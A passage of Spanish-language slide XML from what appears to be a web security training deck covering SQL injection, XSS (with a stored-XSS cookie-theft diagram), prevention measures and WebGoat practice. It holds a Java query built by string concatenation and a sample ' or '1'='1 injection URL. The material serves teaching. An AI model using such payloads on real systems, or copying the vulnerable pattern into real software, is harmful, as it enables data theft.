                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("id") + "'";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Statement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>conn.createStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Resultset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> resultado = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>st.executeQuery</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query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="CuadroTexto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64627947-817D-880A-CC86-AC51DFB601C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="500559" y="3737970"/>
            <a:ext cx="10267625" cy="2031325"/>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El atacante </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>puede modificar el valor del parámetro “id” en su navegador </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>permitiendo obtener información y realizar ataques más peligrosos:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://example.com/app/accountView?id=' or '1'=‘1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Como resultado, se ejecutaría la siguiente consulta:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SELECT * FROM accounts WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>custID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>='' or '1'='1'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Conector recto 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AF893FF-84E5-0F5F-F41F-545DC91F6EC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1232219" y="3343946"/>
            <a:ext cx="8523889" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="004C41"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 2" descr="Malo - Iconos gratis de negocios y finanzas">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BF004B4-698A-2135-255E-28BB1ADF1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8184" y="1219045"/>
            <a:ext cx="751752" cy="75175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88383469-B21B-366C-D968-53039D54D35E}"/>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5545806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71232-2189-A111-F658-8021F8379ED6}"/>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8E59394-58E9-B4C3-2559-1A66134CB96F}"/>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070896D-304A-6D4A-50C7-523E0B3829F9}"/>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SQL - Práctica</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{546741B2-3ACA-73B4-43A4-23D64376D62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2" descr="Install Webgoat 8 - Learn Web Pentesting">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B12C84AF-AE38-65C2-C146-24CBF32D1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552" y="880874"/>
            <a:ext cx="8320408" cy="50962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otón Rojo Play PNG transparente - StickPNG">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1E7BFEF-347C-5388-CC32-3722FE7C24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6479" y="88094"/>
            <a:ext cx="780288" cy="78028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nterfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BB1F0F3-5930-E1A8-3166-F0431E8A118A}"/>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806175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9534-EF4B-A3A9-B09D-07802EA1BC36}"/>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65C2D4E8-2EC6-0496-822A-D1E3225ECE0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5E8445B-A3A2-99FD-2D08-56908A4EE33E}"/>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Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5E26181-4B94-B449-F4C1-76A269D6816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CuadroTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA478CED-55F5-46AA-15BE-847532686B56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1831922" y="1880030"/>
            <a:ext cx="6578747" cy="923330"/>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Permite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ejecutar scripts en el navegador de la víctima </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>que pueden secuestrar las sesiones, desfigurar los sitios web o redirigir al usuario a sitios maliciosos.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CuadroTexto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83BC0121-1230-F202-A30B-5DB2C93684F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1831923" y="3278424"/>
            <a:ext cx="6855010"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Prevención mediante </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>frameworks que escapen automáticamente el código HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, Política de </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Seguridad de Contenidos (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CSP)...</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="CuadroTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87BF67B0-9B41-3001-3668-029F6856A544}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1831922" y="4956782"/>
            <a:ext cx="4936961" cy="3693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Varios tipos: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>reflejado, almacenado, DOM.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Oval 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE3EEF4F-7B9F-DA16-DBBA-712D6BA003EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669956" y="4812816"/>
            <a:ext cx="826579" cy="7225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200" b="1">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEFD5AFE-EEF0-D8D3-364B-0AD08670F4D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669956" y="1987516"/>
            <a:ext cx="826578" cy="71643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200" b="1">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Oval 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EB9313D-26D6-7C66-EC8B-65760743E176}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669956" y="3351398"/>
            <a:ext cx="826578" cy="71643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200" b="1">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Imagen 10" descr="Texto&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C532452-2AB6-651A-4EBB-5E66CD09AC50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="9844" r="44166" b="28445"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8886766" y="1211758"/>
            <a:ext cx="3305234" cy="4587091"/>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617F6863-5AC8-11AE-1C92-A0E3A328F034}"/>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89503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04990-D0C0-E32F-7754-F080DCF2C24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C794F63-0C21-AB7F-3EDC-79F0726BAF5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C9527F9-0359-7DE5-B3E7-017B7C3C38CF}"/>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Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C9AEF16-FF45-684C-D6B3-9C1E85E41A3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4BE7BBDC-9ACA-60BD-D63A-BC7B8D9934A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1081974" y="5031508"/>
            <a:ext cx="15044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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Atacante</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="CuadroTexto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1010C0BA-0DDF-1BE9-03C9-76791D245530}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8780616" y="5033082"/>
            <a:ext cx="15044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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Víctima</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="CuadroTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEC02DED-9CB4-70DD-954F-5A26ECB2A4B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5624694" y="2903386"/>
            <a:ext cx="163880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latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Página web de confianza</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDDEFDD5-5E9F-F37A-DBEA-35B6DDF82941}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1236365" y="3189974"/>
            <a:ext cx="1195686" cy="1779139"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FDC43A0-A44E-6B8A-2ECF-9E2F7CCB677A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="8118" t="5341" r="9988" b="7077"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8601174" y="3701785"/>
            <a:ext cx="1863352" cy="1195666"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BCE4B46-7F73-ECFF-8761-C4F28ADB26A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="707116" y="1607375"/>
            <a:ext cx="3550858"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cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>1. El atacante inyecta carga útil en la base de datos de la página web con código JavaScript malicioso que roba cookies.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 2" descr="Ver las imágenes de origen">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C777B1C-7583-2FE9-B13C-041983C607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2409" y="1471622"/>
            <a:ext cx="1503373" cy="14983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Flecha derecha 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22BA20AF-1442-A627-F235-1ED2A4134757}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19442620">
            <a:off x="2456409" y="2687140"/>
            <a:ext cx="3201552" cy="490064"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 56315"/>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9" name="Flecha derecha 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C03BE27B-6604-B34A-0E4B-D76268278067}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2579570">
            <a:off x="7108739" y="2648560"/>
            <a:ext cx="1942271" cy="509652"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 56315"/>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21" name="Flecha derecha 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D84162B9-4606-9B93-612A-5E425CC18A58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3036503" y="4413311"/>
            <a:ext cx="5216627" cy="470476"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 56315"/>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22" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{486E3EFC-5E4D-F30B-AA2E-F66450FFF2BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3393882" y="4777435"/>
            <a:ext cx="4927444" cy="1477328"/>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ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>3. Tras la ejecución del script, la víctima envía su cookie al atacante, quien la extrae y utiliza después para secuestrar la sesión de la víctima.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F64C206D-F1E6-720F-659A-8E5B89E427DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8252000" y="1244589"/>
